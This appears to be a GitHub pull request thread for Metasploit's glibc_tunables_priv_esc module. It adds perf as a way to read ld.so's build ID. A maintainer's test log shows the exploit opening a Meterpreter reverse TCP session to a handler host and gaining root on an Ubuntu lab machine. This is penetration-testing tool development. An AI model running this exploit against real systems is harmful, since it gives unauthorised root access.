Add a way to get the buildid via perf

[jvoisin]

In the same spirit than #18632, since it's pretty common to have perf installed on some production machines.

$ perf buildid-list -i /bin/bash
0b6b11360e339f231f17484da2c87d0d78554e31
$

[jheysel-r7]

Thanks for the addition @jvoisin! I installed perf version 6.2.16 on Ubuntu 22.04, edited def check_ld_so_build_id so that using perf was the only code path and it worked great.

msf6 exploit(linux/local/glibc_tunables_priv_esc) > run

[*] Started reverse TCP handler on 192.168.123.1:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The glibc version (2.35-0ubuntu3.1) found on the target appears to be vulnerable
[*] Using perf
[+] The Build ID for ld.so: 61ef896a699bb1c2e4e231642b2e1688b2f1a61e is in the list of supported Build IDs for the exploit.
[+] The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.
[*] Sending stage (3045380 bytes) to 192.168.123.228
[*] Meterpreter session 2 opened (192.168.123.1:5555 -> 192.168.123.228:39842) at 2024-01-22 21:52:28 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.123.228
OS           : Ubuntu 22.04 (Linux 6.2.0-35-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[jheysel-r7]

Release Notes

This PR adds a way to get the Build ID from ld.so by using the 'perf' command. Before this module depended on the commands 'file' and 'readelf' being installed to get the Build ID.